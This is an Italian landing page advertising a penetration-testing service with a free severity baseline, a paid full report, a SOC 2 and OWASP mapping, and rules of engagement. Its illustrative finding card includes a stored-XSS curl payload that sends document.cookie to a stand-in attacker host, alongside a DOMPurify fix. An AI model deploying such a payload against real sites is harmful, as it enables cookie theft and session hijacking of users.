Eseguiamo un penetration test autorizzato sulla tua applicazione web senza costi e condividiamo il conteggio per severità. Sblocca i findings completi (passi di riproduzione, punteggi CVSS, indicazioni di remediation ed evidenze SOC 2) a un prezzo fisso scritto nell'autorizzazione prima di iniziare.
Un pentest tradizionale costa tra 8.000 e 40.000 euro e richiede due mesi dall'inizio del procurement alla consegna. Così i founder lo rimandano oltre l'audit SOC 2, oltre la review di procurement enterprise, e a volte oltre il breach.
Abbiamo rimosso la barriera economica in entrata, così la conversazione può partire dai findings, non dalle fatture. Paghi solo quando c'è qualcosa per cui valga la pena pagare, e decidi se il report vale il prezzo dopo aver già visto il conteggio per severità.
Niente loop di procurement. Niente lista d'attesa trimestrale. Niente trattativa sulla tariffa giornaliera. Tutto l'inizio gira su un solo form e una sola call.
Email di lavoro e URL dell'applicazione che vuoi testare. Tutto qui.
Quindici minuti per confermare asset in-scope, ruoli di autenticazione e sottosistemi out-of-scope. Prezzo di sblocco preventivato lo stesso giorno.
Un documento breve definisce scope, rate limit, regole di testing non-distruttivo e il prezzo fisso di sblocco. Non iniziamo prima della controfirma.
Il conteggio per severità arriva gratis. Sblocca il report completo per ricevere findings, CVSS, passi di riproduzione, indicazioni di remediation ed evidenze SOC 2.
Il tier gratuito esiste perché tu possa decidere in modo informato se passare al tier a pagamento. Se non troviamo nulla di critical, non devi nulla.
Ogni finding nel report a pagamento segue la stessa struttura: classificazione, evidenza, ricetta di riproduzione, blast radius e uno snippet di remediation che gli ingegneri possono rilasciare senza una call di follow-up.
La card a destra è illustrativa. Scarica qui sotto un esempio sanitizzato di sei pagine del report completo.
curl -X POST https://app.example.com/api/v1/comments \
-H "Authorization: Bearer $TOKEN" \
-d '{"body":"<img src=x onerror=fetch(\"https://attacker.tld/?c=\"+document.cookie)>"}'
// Sanitize on render, not on write.
import DOMPurify from "dompurify";
<div dangerouslySetInnerHTML={{ __html: DOMPurify.sanitize(comment.body) }} />
Gli auditor vogliono evidenze, non screenshot. Il report a pagamento collega ogni finding ai criteri SOC 2 toccati e la nostra coverage di testing è mappata sulla OWASP Web Security Testing Guide, così puoi dimostrare uno scope completo, non un sampling selettivo.
| Controllo SOC 2 | Cosa testiamo | Sezione OWASP WSTG |
|---|---|---|
| CC4.1 Monitoring | Coverage di detection su injection, broken auth e percorsi di privilege escalation | WSTG-INPV, WSTG-ATHN, WSTG-ATHZ |
| CC7.1 System operations | Completezza dei log e resistenza alla manomissione sotto attività di attacco | WSTG-ERRH, WSTG-CRYP |
| CC7.4 Incident response | Verifica che gli alert scattino sui pattern di attacco che il tuo runbook dichiara di coprire | WSTG-CONF, WSTG-IDNT |
Dopo la remediation, ri-testiamo gli stessi controlli ed emettiamo un'attestazione di follow-up. Il re-test è incluso nel prezzo di sblocco per 60 giorni.
Il penetration testing autorizzato è una prassi definita da oltre vent'anni. Non facciamo nulla senza il tuo permesso firmato, e una volta ottenuto seguiamo regole operative rigorose così il test non diventa mai l'incidente.
Confermiamo che controlli l'asset tramite record DNS TXT o lettera firmata su carta intestata aziendale. Nessuna eccezione, neanche con clienti già noti.
Le probe automatizzate sono limitate a 10 richieste al secondo per host. L'exploitation manuale procede a velocità umana. Il tuo monitoring vedrà traffico, non pressione.
Non cancelliamo, modifichiamo o esfiltriamo dati di produzione. La proof-of-concept viene catturata alla profondità minima necessaria a confermare la vulnerabilità.
Findings, prove e screenshot sono cifrati end to end. L'accesso è limitato al lead tester e a un solo reviewer.
I report vengono conservati per 90 giorni per supportare il re-test incluso, poi cancellati su richiesta. Non condividiamo mai i findings con nessuno al di fuori del progetto.
Tutto ciò che è dichiarato out-of-scope nell'autorizzazione viene trattato come production-critical. Se un finding lo attraversa, ci fermiamo e ci consultiamo prima di proseguire.
Il pentest copre la tua applicazione. L'add-on OSINT copre il perimetro che non puoi patchare: credenziali trapelate nei dump pubblici, bucket S3 esposti e indicizzati dai motori di ricerca, repository GitHub con token hardcoded e l'impronta LinkedIn che rende banale il phishing mirato.
Quotato come engagement separato. La maggior parte dei team lo aggiunge al secondo ciclo, dopo aver risolto i findings dell'applicazione.
Inserisci la tua email di lavoro e l'URL dell'applicazione che vuoi testare. Rispondiamo entro 24 ore con uno scope proposto, il prezzo di sblocco e uno slot di call da 15 minuti.
Due campi. Al resto pensiamo noi.
Baseline gratuita. Sblocco a pagamento solo se c'è qualcosa per cui valga la pena pagare. Scoping questa settimana.
Richiedi un pentest gratuito